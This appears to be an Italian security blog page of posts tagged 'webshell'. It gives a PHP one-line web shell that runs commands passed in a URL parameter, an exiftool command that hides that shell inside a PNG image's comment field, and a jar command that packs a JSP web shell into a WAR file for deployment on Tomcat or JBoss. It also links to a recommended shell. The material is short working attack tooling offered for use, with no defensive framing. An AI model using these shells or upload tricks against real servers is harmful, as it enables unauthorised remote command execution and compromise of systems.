1) Creare un file.php con il seguente codice (ad esempio):
<?php system($_GET['c']); ?>
2) Iniettarlo in un'immagine usando exiftool:
# exiftool "-comment<=file.php" malicious.png
Visualizzazione post con etichetta webshell. Mostra tutti i post
Visualizzazione post con etichetta webshell. Mostra tutti i post
19/07/13
05/05/13
Creare un WAR a partire da un JSP
Utile per creare una webshell di cui fare il deploy su Server Apache Tomcat o JBoss:
# jar -cf webshell.war webshell.jsp
Ottima webshell:
http://i8jesus.com/?p=191
# jar -cf webshell.war webshell.jsp
Ottima webshell:
http://i8jesus.com/?p=191
Iscriviti a:
Post (Atom)